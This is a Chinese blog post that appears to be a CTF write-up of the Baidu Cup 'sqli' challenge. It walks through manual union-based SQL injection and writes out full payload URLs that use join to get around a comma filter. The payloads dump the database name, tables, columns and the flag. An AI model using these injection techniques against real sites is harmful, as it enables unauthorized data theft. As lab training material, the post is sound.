博客
关于我
从零开始学安全(三十四)●百度杯 ctf比赛 九月场 sqli
阅读量:413 次
发布时间:2019-03-06

本文共 1286 字,大约阅读时间需要 4 分钟。

先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该是他了 暗示的很明确了

 

显示 1 flag 先手动把 习惯手动sql注入

先判断 是数字型还是字符型 1' %23 看出不来 直接 union select 1,2 %23

ok

2被截断了 说明,存在被截断 而且直接是输出了字符串 猜测字符型 竟然 , 不能用 可以join 连接select

union select * from select 1 join select 2 %23 成功回显 按照这个直接获取库名表名

http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select database()) a join (select null) b%23

获取库 sqli

http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select table_name from information_schema.tables where table_schema='sqli') a join (select null) b%23

获取表 users

http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select null) b%23

获取字段

id username

id,username,flag_9c861b688330 null

ok 发现了

http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select flag_9c861b688330 from users) a join (select null) b%23

得到结果

id                     username

flag{7176716c-1d16-474c-8660-33faaf8bc43e}  null

转载地址:http://qujuz.baihongyu.com/

你可能感兴趣的文章
asp.net mvc 之旅 —— 第六站 ActionFilter的应用及源码分析
查看>>
Tomcat 热部署
查看>>
深入解析 HTTP 缓存控制
查看>>
深入浅出访问者模式
查看>>
深入探索Android热修复技术原理读书笔记 —— 热修复技术介绍
查看>>
百度前端技术学院task16源代码
查看>>
解析js中( ( ) { } ( ) )的含义
查看>>
js设计模式总结5
查看>>
Python大神编程常用4大工具,你用过几个?
查看>>
一文带你了解图神经网络
查看>>
9个常用ES6特性归纳(一般用这些就够了)
查看>>
3D渲染集群,你了解多少?
查看>>
除了方文山,用TA你也能帮周杰伦写歌词了
查看>>
关于GO语言,这篇文章讲的很明白
查看>>
华为云FusionInsight湖仓一体解决方案的前世今生
查看>>
大数据处理黑科技:揭秘PB级数仓GaussDB(DWS) 并行计算技术
查看>>
C++调用Go方法的字符串传递问题及解决方案
查看>>
云原生2.0时代下,DevOps实践如何才能更加高效敏捷?
查看>>
技巧收藏|10个JavaScript常用数组操作方法
查看>>
两种端到端通用目标检测方法
查看>>